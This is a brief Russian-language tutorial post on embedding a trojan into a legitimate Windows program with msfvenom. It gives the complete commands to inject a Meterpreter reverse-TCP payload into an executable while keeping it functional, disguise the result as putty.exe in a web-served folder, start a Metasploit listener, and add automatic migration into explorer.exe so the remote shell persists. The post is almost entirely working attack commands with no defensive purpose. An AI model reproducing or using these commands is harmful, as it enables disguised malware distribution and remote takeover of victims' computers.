Внедрение троянца в легитимную программу через Msfvenom

Внедрение троянца в легитимную программу через Msfvenom

Sam Sepiol

Объединение файла с программой и нашим бекдором:

msfvenom -a x86 --platform windows -x /root/Desktop/program.exe -k -p windows/meterpreter/reverse_tcp lport=5000 lhost=192.168.0.16 -f exe -o /var/www/html/putty.exe

-a указываем тип архитектуры

--platform указываем тип операционной системы

-x указываем где сохранен наш файл с нормальной программой

-k проверяет что бы программа была функциональна

-p пейлоад


запустим слушатель:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 5000
set lhost 192.168.0.16
run


есть решение этого:

msfvenom -a x86 --platform windows -x /root/Desktop/program.exe -k -p windows/meterpreter/reverse_tcp lport=5000 lhost=192.168.0.16 -f exe prependmigrate=true prependmigrateprocess=explorer.exe -o /var/www/html/putty.exe

добавим две опции:

prependmigrate=true - включаем автоматическое мигрирование

prependmigrateprocess=explorer.exe - тут указываем в какой процесс необходимо мигрировать


Report Page